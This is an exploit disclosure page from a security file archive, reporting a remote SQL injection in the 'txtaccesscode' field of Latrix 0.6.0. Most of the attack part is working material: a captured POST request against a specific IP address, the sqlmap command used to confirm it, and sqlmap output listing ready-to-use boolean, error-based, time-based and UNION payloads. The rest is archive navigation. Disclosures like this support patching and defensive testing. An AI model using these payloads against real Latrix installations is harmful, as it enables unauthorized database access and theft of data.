Latrix 0.6.0 SQL Injection

Latrix 0.6.0 SQL Injection: Posted Apr 1, 2021; Authored by cptsticky; Latrix version 0.6.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 78887bd4cc87052539321b4d6d74e78c9989591442e0a224eabc388c8df1bea1; Download | Favorite | View

Latrix 0.6.0 SQL Injection

# Exploit Title: Latrix 0.6.0 – 'txtaccesscode' SQL Injection
# Date: 03/30/2021
# Exploit Author: cptsticky
# Vendor Homepage: https://sourceforge.net/projects/latrix
# Software Link: https://sourceforge.net/projects/latrix/files/latest/download
# Version: 0.6.0
# Tested on: Ubuntu 20.04

POST /latrix/inandout.php HTTP/1.1
Host: 18.222.194.190
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: https://18.222.194.190
Connection: close
Referer: https://18.222.194.190/latrix/inandoutcode.php?target=inandout
Cookie: PHPSESSID=q9b6a0e050sl6jae7u64usvrs1
Upgrade-Insecure-Requests: 1

txtaccesscode=111&btnsubmit=Submit



Command used to prove injection: sqlmap -r bam.txt -p txtaccesscode


Output
----------------snip----------------
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtaccesscode (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: txtaccesscode=-3451' OR 7070=7070#&btnsubmit=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: txtaccesscode=111' AND GTID_SUBSET(CONCAT(0x716b627a71,(SELECT (ELT(2717=2717,1))),0x71786a7071),2717)-- GnJe&btnsubmit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: txtaccesscode=111' AND (SELECT 8547 FROM (SELECT(SLEEP(5)))qHfx)-- tljS&btnsubmit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: txtaccesscode=111' UNION ALL SELECT CONCAT(0x716b627a71,0x7577616c424c7a446a4c7854717a7372696c7145414e4e5a597a4e76784e616e6f48635971446b44,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&btnsubmit=Submit
---
[16:29:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.6

Top Authors In Last 30 Days

Red Hat 235 files
Ubuntu 50 files
Debian 19 files
LiquidWorm 16 files
Apple 9 files
Gentoo 5 files
Alter Prime 3 files
Google Security Research 3 files
Pierre Kim 2 files
EQSTLab 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,945)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,337)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,987)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

Latrix 0.6.0 SQL Injection

Latrix 0.6.0 SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Latrix 0.6.0 SQL Injection

Share This

Latrix 0.6.0 SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems